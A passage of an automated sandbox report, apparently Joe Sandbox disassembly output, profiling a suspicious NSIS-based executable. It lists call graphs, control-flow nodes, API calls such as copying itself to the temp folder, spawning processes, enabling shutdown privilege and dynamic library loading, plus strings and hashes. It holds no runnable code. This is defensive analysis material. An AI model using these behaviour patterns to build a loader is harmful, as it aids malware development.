calls 5171->5173 5174 4028c4 5173->5174 5175 4028d3 SetFilePointer 5174->5175 5175->5172 5176 4028e3 5175->5176 5178 4065e9 wsprintfW 5176->5178 5178->5172 6094 401f37 6095 402dcb 21 API calls 6094->6095 6096 401f3d 6095->6096 6097 402dcb 21 API calls 6096->6097 6098 401f46 6097->6098 6099 402dcb 21 API calls 6098->6099 6100 401f4f 6099->6100 6101 402dcb 21 API calls 6100->6101 6102 401f58 6101->6102 6103 401423 28 API calls 6102->6103 6104 401f5f 6103->6104 6111 405cc8 ShellExecuteExW 6104->6111 6106 401fa7 6107 402953 6106->6107 6108 406b41 5 API calls 6106->6108 6109 401fc4 CloseHandle 6108->6109 6109->6107 6111->6106 6112 4014b8 6113 4014be 6112->6113 6114 401389 2 API calls 6113->6114 6115 4014c6 6114->6115 6116 402fb8 6117 402fe3 6116->6117 6118 402fca SetTimer 6116->6118 6119 403031 6117->6119 6120 403037 MulDiv 6117->6120 6118->6117 6121 402ff1 wsprintfW SetWindowTextW SetDlgItemTextW 6120->6121 6121->6119 6123 401d3c 6124 402da9 21 API calls 6123->6124 6125 401d42 IsWindow 6124->6125 6126 401a45 6125->6126 6127 738b1774 6128 738b17a3 6127->6128 6129 738b1bff 22 API calls 6128->6129 6130 738b17aa 6129->6130 6131 738b17bd 6130->6131 6132 738b17b1 6130->6132 6134 738b17c7 6131->6134 6135 738b17e4 6131->6135 6133 738b1312 2 API calls 6132->6133 6141 738b17bb 6133->6141 6138 738b15dd 3 API calls 6134->6138 6136 738b17ea 6135->6136 6137 738b180e 6135->6137 6139 738b1654 3 API calls 6136->6139 6140 738b15dd 3 API calls 6137->6140 6142 738b17cc 6138->6142 6143 738b17ef 6139->6143 6140->6141 6144 738b1654 3 API calls 6142->6144 6145 738b1312 2 API calls 6143->6145 6146 738b17d2 6144->6146 6148 738b17f5 GlobalFree 6145->6148 6147 738b1312 2 API calls 6146->6147 6149 738b17d8 GlobalFree 6147->6149 6148->6141 6150 738b1809 GlobalFree 6148->6150 6149->6141 6150->6141

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 403665-4036b7 SetErrorMode GetVersionExW 1 4036f1-4036f6 0->1 2 4036b9-4036e9 GetVersionExW 0->2 3 4036f8 1->3 4 4036fe-403740 1->4 2->1 3->4 5 403742-40374a call 406a96 4->5 6 403753 4->6 5->6 12 40374c 5->12 7 403758-40376c call 406a26 lstrlenA 6->7 13 40376e-40378a call 406a96 * 3 7->13 12->6 20 40379b-4037ff #17 OleInitialize SHGetFileInfoW call 4066a2 GetCommandLineW call 4066a2 13->20 21 40378c-403792 13->21 28 403801-403803 20->28 29 403808-40381c call 405f9e CharNextW 20->29 21->20 26 403794 21->26 26->20 28->29 32 403917-40391d 29->32 33 403821-403827 32->33 34 403923 32->34 36 403830-403837 33->36 37 403829-40382e 33->37 35 403937-403951 GetTempPathW call 403634 34->35 44 403953-403971 GetWindowsDirectoryW lstrcatW call 403634 35->44 45 4039a9-4039c3 DeleteFileW call 4030f5 35->45 39 403839-40383e 36->39 40 40383f-403843 36->40 37->36 37->37 39->40 42 403904-403913 call 405f9e 40->42 43 403849-40384f 40->43 42->32 61 403915-403916 42->61 47 403851-403858 43->47 48 403869-4038a2 43->48 44->45 64 403973-4039a3 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403634 44->64 66 403bb0-403bc0 call 403c82 OleUninitialize 45->66 67 4039c9-4039cf 45->67 49 40385a-40385d 47->49 50 40385f 47->50 51 4038a4-4038a9 48->51 52 4038bf-4038f9 48->52 49->48 49->50 50->48 51->52 56 4038ab-4038b3 51->56 58 403901-403903 52->58 59 4038fb-4038ff 52->59 62 4038b5-4038b8 56->62 63 4038ba 56->63 58->42 59->58 65 403925-403932 call 4066a2 59->65 61->32 62->52 62->63 63->52 64->45 64->66 65->35 79 403bc2-403bd2 call 405d02 ExitProcess 66->79 80 403be6-403bec 66->80 71 4039d5-4039e0 call 405f9e 67->71 72 403a68-403a6f call 403d74 67->72 81 4039e2-403a17 71->81 82 403a2e-403a38 71->82 78 403a74-403a78 72->78 78->66 83 403c6a-403c72 80->83 84 403bee-403c04 GetCurrentProcess OpenProcessToken 80->84 87 403a19-403a1d 81->87 90 403a3a-403a48 call 406079 82->90 91 403a7d-403aa3 call 405c6d lstrlenW call 4066a2 82->91 92 403c74 83->92 93 403c78-403c7c ExitProcess 83->93 88 403c06-403c34 LookupPrivilegeValueW AdjustTokenPrivileges 84->88 89 403c3a-403c48 call 406a96 84->89 94 403a26-403a2a 87->94 95 403a1f-403a24 87->95 88->89 104 403c56-403c61 ExitWindowsEx 89->104 105 403c4a-403c54 89->105 90->66 106 403a4e-403a64 call 4066a2 * 2 90->106 110 403ab4-403acc 91->110 111 403aa5-403aaf call 4066a2 91->111 92->93 94->87 99 403a2c 94->99 95->94 95->99 99->82 104->83 108 403c63-403c65 call 40140b 104->108 105->104 105->108 106->72 108->83 116 403ad1-403ad5 110->116 111->110 118 403ada-403b04 wsprintfW call 4066df 116->118 122 403b06-403b0b call 405bf6 118->122 123 403b0d call 405c50 118->123 127 403b12-403b14 122->127 123->127 128 403b50-403b6f SetCurrentDirectoryW call 406462 CopyFileW 127->128 129 403b16-403b20 GetFileAttributesW 127->129 137 403b71-403b92 call 406462 call 4066df call 405c85 128->137 138 403bae 128->138 130 403b41-403b4c 129->130 131 403b22-403b2b DeleteFileW 129->131 130->116 134 403b4e 130->134 131->130 133 403b2d-403b3f call 405dae 131->133 133->118 133->130 134->66 146 403b94-403b9e 137->146 147 403bd8-403be4 CloseHandle 137->147 138->66 146->138 148 403ba0-403ba8 call 4069ff 146->148 147->138 148->118 148->138
                                                        APIs
                                                        • SetErrorMode.KERNELBASE ref: 00403688
                                                        • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 004036B3
                                                        • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 004036C6
                                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040375F
                                                        • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040379C
                                                        • OleInitialize.OLE32(00000000), ref: 004037A3
                                                        • SHGetFileInfoW.SHELL32(00420F08,00000000,?,000002B4,00000000), ref: 004037C2
                                                        • GetCommandLineW.KERNEL32(00428A60,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037D7
                                                        • CharNextW.USER32(00000000,"C:\Users\user\Desktop\0GuwV0t2UU.exe",00000020,"C:\Users\user\Desktop\0GuwV0t2UU.exe",00000000,?,00000008,0000000A,0000000C), ref: 00403810
                                                        • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403948
                                                        • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403959
                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403965
                                                        • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403979
                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403981
                                                        • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403992
                                                        • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040399A
                                                        • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004039AE
                                                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\0GuwV0t2UU.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A87
                                                          • Part of subcall function 004066A2: lstrcpynW.KERNEL32(?,?,00000400,004037D7,00428A60,NSIS Error,?,00000008,0000000A,0000000C), ref: 004066AF
                                                        • wsprintfW.USER32 ref: 00403AE4
                                                        • GetFileAttributesW.KERNEL32(0042C800,C:\Users\user\AppData\Local\Temp\), ref: 00403B17
                                                        • DeleteFileW.KERNEL32(0042C800), ref: 00403B23
                                                        • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403B51
                                                          • Part of subcall function 00406462: MoveFileExW.KERNEL32(?,?,00000005,00405F60,?,00000000,000000F1,?,?,?,?,?), ref: 0040646C
                                                        • CopyFileW.KERNEL32(C:\Users\user\Desktop\0GuwV0t2UU.exe,0042C800,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403B67
                                                          • Part of subcall function 00405C85: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405CAE
                                                          • Part of subcall function 00405C85: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405CBB
                                                          • Part of subcall function 004069FF: FindFirstFileW.KERNELBASE(?,00425F98,C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp,004060C2,C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp,C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp,C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp, 4#v.#v,?,76232EE0,00405DCE,?,76233420,76232EE0), ref: 00406A0A
                                                          • Part of subcall function 004069FF: FindClose.KERNEL32(00000000), ref: 00406A16
                                                        • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403BB5
                                                        • ExitProcess.KERNEL32 ref: 00403BD2
                                                        • CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,0042C800,00000000), ref: 00403BD9
                                                        • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403BF5
                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403BFC
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403C11
                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403C34
                                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 00403C59
                                                        • ExitProcess.KERNEL32 ref: 00403C7C
                                                          • Part of subcall function 00405C50: CreateDirectoryW.KERNELBASE(?,00000000,00403658,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040394F,?,00000008,0000000A,0000000C), ref: 00405C56
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                        • String ID: "C:\Users\user\Desktop\0GuwV0t2UU.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\0GuwV0t2UU.exe$C:\Users\user\fllesskabsejede\Modfaldent$C:\Users\user\fllesskabsejede\Modfaldent$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                        • API String ID: 1813718867-1636419188
                                                        • Opcode ID: 58d2ad6b71f08f896e928fc089387d11d42e4e28cec5ba88fd5f2c704c1edd34
                                                        • Instruction ID: 48c25345ab5c6186891d52a8fabce3a967a0262862fdddf466c19d710b4311b7
                                                        • Opcode Fuzzy Hash: 58d2ad6b71f08f896e928fc089387d11d42e4e28cec5ba88fd5f2c704c1edd34
                                                        • Instruction Fuzzy Hash: EDF1E571604301AAD720AF659D05B2B7EE8EB8570AF10483EF581B22D1DB7CDA45CB6E
                                                        APIs
                                                          • Part of subcall function 738B12BB: GlobalAlloc.KERNEL32(00000040,?,738B12DB,?,738B137F,00000019,738B11CA,-000000A0), ref: 738B12C5
                                                        • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 738B1D2D
                                                        • lstrcpyW.KERNEL32(00000008,?), ref: 738B1D75
                                                        • lstrcpyW.KERNEL32(00000808,?), ref: 738B1D7F
                                                        • GlobalFree.KERNEL32(00000000), ref: 738B1D92
                                                        • GlobalFree.KERNEL32(?), ref: 738B1E74
                                                        • GlobalFree.KERNEL32(?), ref: 738B1E79
                                                        • GlobalFree.KERNEL32(?), ref: 738B1E7E
                                                        • GlobalFree.KERNEL32(00000000), ref: 738B2068
                                                        • lstrcpyW.KERNEL32(?,?), ref: 738B2222
                                                        • GetModuleHandleW.KERNEL32(00000008), ref: 738B22A1
                                                        • LoadLibraryW.KERNEL32(00000008), ref: 738B22B2
                                                        • GetProcAddress.KERNEL32(?,?), ref: 738B230C
                                                        • lstrlenW.KERNEL32(00000808), ref: 738B2326
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3172815841.00000000738B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 738B0000, based on PE: true
                                                        • Associated: 00000000.00000002.3172732409.00000000738B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.3173096944.00000000738B4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.3173194995.00000000738B6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_738b0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                        • String ID:
                                                        • API String ID: 245916457-0
                                                        • Opcode ID: 9e5bfc1510dac257eeeb0c679a65200fae253f061f3039980495351a30b68fde
                                                        • Instruction ID: 3739394fbb79d0c75051bd23ed20d2bc10651c56591d86ebd0fd02c17ec957ef
                                                        • Opcode Fuzzy Hash: 9e5bfc1510dac257eeeb0c679a65200fae253f061f3039980495351a30b68fde
                                                        • Instruction Fuzzy Hash: E5228B71D0064BDBDB11CFE8C5827AEB7B7FB08305F14452AD2A6EA390D778A681CB50

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 748 405dae-405dd4 call 406079 751 405dd6-405de8 DeleteFileW 748->751 752 405ded-405df4 748->752 753 405f6a-405f6e 751->753 754 405df6-405df8 752->754 755 405e07-405e17 call 4066a2 752->755 756 405f18-405f1d 754->756 757 405dfe-405e01 754->757 761 405e26-405e27 call 405fbd 755->761 762 405e19-405e24 lstrcatW 755->762 756->753 759 405f1f-405f22 756->759 757->755 757->756 763 405f24-405f2a 759->763 764 405f2c-405f34 call 4069ff 759->764 765 405e2c-405e30 761->765 762->765 763->753 764->753 772 405f36-405f4a call 405f71 call 405d66 764->772 768 405e32-405e3a 765->768 769 405e3c-405e42 lstrcatW 765->769 768->769 771 405e47-405e63 lstrlenW FindFirstFileW 768->771 769->771 773 405e69-405e71 771->773 774 405f0d-405f11 771->774 788 405f62-405f65 call 405727 772->788 789 405f4c-405f4f 772->789 777 405e91-405ea5 call 4066a2 773->777 778 405e73-405e7b 773->778 774->756 776 405f13 774->776 776->756 790 405ea7-405eaf 777->790 791 405ebc-405ec7 call 405d66 777->791 780 405ef0-405f00 FindNextFileW 778->780 781 405e7d-405e85 778->781 780->773 787 405f06-405f07 FindClose 780->787 781->777 784 405e87-405e8f 781->784 784->777 784->780 787->774 788->753 789->763 794 405f51-405f60 call 405727 call 406462 789->794 790->780 795 405eb1-405eba call 405dae 790->795 801 405ee8-405eeb call 405727 791->801 802 405ec9-405ecc 791->802 794->753 795->780 801->780 804 405ee0-405ee6 802->804 805 405ece-405ede call 405727 call 406462 802->805 804->780 805->780
                                                        APIs
                                                        • DeleteFileW.KERNELBASE(?,?,76233420,76232EE0,"C:\Users\user\Desktop\0GuwV0t2UU.exe"), ref: 00405DD7
                                                        • lstrcatW.KERNEL32(00424F50,\*.*,00424F50,?,?,76233420,76232EE0,"C:\Users\user\Desktop\0GuwV0t2UU.exe"), ref: 00405E1F
                                                        • lstrcatW.KERNEL32(?,0040A014,?,00424F50,?,?,76233420,76232EE0,"C:\Users\user\Desktop\0GuwV0t2UU.exe"), ref: 00405E42
                                                        • lstrlenW.KERNEL32(?,?,0040A014,?,00424F50,?,?,76233420,76232EE0,"C:\Users\user\Desktop\0GuwV0t2UU.exe"), ref: 00405E48
                                                        • FindFirstFileW.KERNEL32(00424F50,?,?,?,0040A014,?,00424F50,?,?,76233420,76232EE0,"C:\Users\user\Desktop\0GuwV0t2UU.exe"), ref: 00405E58
                                                        • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EF8
                                                        • FindClose.KERNEL32(00000000), ref: 00405F07
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                        • String ID: "C:\Users\user\Desktop\0GuwV0t2UU.exe"$POB$\*.*
                                                        • API String ID: 2035342205-2442518598
                                                        • Opcode ID: 3d2f7fed8d6250162ff3c39f7b63e528597fb1dc0209ffdda96aed75cda8f6cd
                                                        • Instruction ID: 08bfc2840413863968cf962241dff1eb28b75ffaef7a08e493f25e9a85e6eaf1
                                                        • Opcode Fuzzy Hash: 3d2f7fed8d6250162ff3c39f7b63e528597fb1dc0209ffdda96aed75cda8f6cd
                                                        • Instruction Fuzzy Hash: E341F130800A06A6CB21AB61CD89BBF7278EF45754F14413FF485B11C1DB7C4A82DEAE

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1078 406dc0-406dc5 1079 406e36-406e54 1078->1079 1080 406dc7-406df6 1078->1080 1081 40742c-407441 1079->1081 1082 406df8-406dfb 1080->1082 1083 406dfd-406e01 1080->1083 1084 407443-407459 1081->1084 1085 40745b-407471 1081->1085 1086 406e0d-406e10 1082->1086 1087 406e03-406e07 1083->1087 1088 406e09 1083->1088 1089 407474-40747b 1084->1089 1085->1089 1090 406e12-406e1b 1086->1090 1091 406e2e-406e31 1086->1091 1087->1086 1088->1086 1093 4074a2-4074ae 1089->1093 1094 40747d-407481 1089->1094 1095 406e20-406e2c 1090->1095 1096 406e1d 1090->1096 1092 407003-407021 1091->1092 1101 407023-407037 1092->1101 1102 407039-40704b 1092->1102 1105 406c44-406c4d 1093->1105 1098 407630-40763a 1094->1098 1099 407487-40749f 1094->1099 1097 406e96-406ec4 1095->1097 1096->1095 1103 406ee0-406efa 1097->1103 1104 406ec6-406ede 1097->1104 1107 407646-407659 1098->1107 1099->1093 1106 40704e-407058 1101->1106 1102->1106 1110 406efd-406f07 1103->1110 1104->1110 1108 406c53 1105->1108 1109 40765b 1105->1109 1111 40705a 1106->1111 1112 406ffb-407001 1106->1112 1113 40765e-407662 1107->1113 1114 406c5a-406c5e 1108->1114 1115 406d9a-406dbb 1108->1115 1116 406cff-406d03 1108->1116 1117 406d6f-406d73 1108->1117 1109->1113 1119 406f0d 1110->1119 1120 406e7e-406e84 1110->1120 1121 406fd6-406fda 1111->1121 1122 40716b-407178 1111->1122 1112->1092 1118 406f9f-406fa9 1112->1118 1114->1107 1131 406c64-406c71 1114->1131 1115->1081 1123 406d09-406d22 1116->1123 1124 4075af-4075b9 1116->1124 1133 406d79-406d8d 1117->1133 1134 4075be-4075c8 1117->1134 1125 4075ee-4075f8 1118->1125 1126 406faf-406fd1 1118->1126 1137 406e63-406e7b 1119->1137 1138 4075ca-4075d4 1119->1138 1127 406f37-406f3d 1120->1127 1128 406e8a-406e90 1120->1128 1129 406fe0-406ff8 1121->1129 1130 4075e2-4075ec 1121->1130 1122->1105 1132 4071c7-4071d6 1122->1132 1139 406d25-406d29 1123->1139 1124->1107 1125->1107 1126->1122 1140 406f9b 1127->1140 1142 406f3f-406f5d 1127->1142 1128->1097 1128->1140 1129->1112 1130->1107 1131->1109 1136 406c77-406cbd 1131->1136 1132->1081 1141 406d90-406d98 1133->1141 1134->1107 1144 406ce5-406ce7 1136->1144 1145 406cbf-406cc3 1136->1145 1137->1120 1138->1107 1139->1116 1143 406d2b-406d31 1139->1143 1140->1118 1141->1115 1141->1117 1146 406f75-406f87 1142->1146 1147 406f5f-406f73 1142->1147 1153 406d33-406d3a 1143->1153 1154 406d5b-406d6d 1143->1154 1151 406cf5-406cfd 1144->1151 1152 406ce9-406cf3 1144->1152 1149 406cc5-406cc8 GlobalFree 1145->1149 1150 406cce-406cdc GlobalAlloc 1145->1150 1148 406f8a-406f94 1146->1148 1147->1148 1148->1127 1155 406f96 1148->1155 1149->1150 1150->1109 1158 406ce2 1150->1158 1151->1139 1152->1151 1152->1152 1156 406d45-406d55 GlobalAlloc 1153->1156 1157 406d3c-406d3f GlobalFree 1153->1157 1154->1141 1160 4075d6-4075e0 1155->1160 1161 406f1c-406f34 1155->1161 1156->1109 1156->1154 1157->1156 1158->1144 1160->1107 1161->1127
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f9c4c7fe21643fbeaf7e138ee869f294de0f5e1fd31501e9972d14a61e44697c
                                                        • Instruction ID: 2c84522690a72e7b125efbdd79dcce5a6d58b8fc95eff680b6a5e34cc787ad25
                                                        • Opcode Fuzzy Hash: f9c4c7fe21643fbeaf7e138ee869f294de0f5e1fd31501e9972d14a61e44697c
                                                        • Instruction Fuzzy Hash: 5EF17670D04229CBDF28CFA8C8946ADBBB1FF44305F24856ED456BB281D7786A86CF45
                                                        APIs
                                                        • FindFirstFileW.KERNELBASE(?,00425F98,C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp,004060C2,C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp,C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp,C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp, 4#v.#v,?,76232EE0,00405DCE,?,76233420,76232EE0), ref: 00406A0A
                                                        • FindClose.KERNEL32(00000000), ref: 00406A16
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp, xrefs: 004069FF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: Find$CloseFileFirst
                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp
                                                        • API String ID: 2295610775-1944480652
                                                        • Opcode ID: 5aa02b152b1bdaa4a45d264aeb005cec44e37fe5ecd5a9a233d7a39d055da6f3
                                                        • Instruction ID: 20279147522b4af1e9b85c80e58242a12c3cc79f3f19e9bc8d226ca4cfbd33e3
                                                        • Opcode Fuzzy Hash: 5aa02b152b1bdaa4a45d264aeb005cec44e37fe5ecd5a9a233d7a39d055da6f3
                                                        • Instruction Fuzzy Hash: 9FD012317595205BC640673C6E0C89B7E589F1A3317128A36F06BF21E4D7348C628A9C
                                                        APIs
                                                        • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040293F
                                                        Memory Dump Source
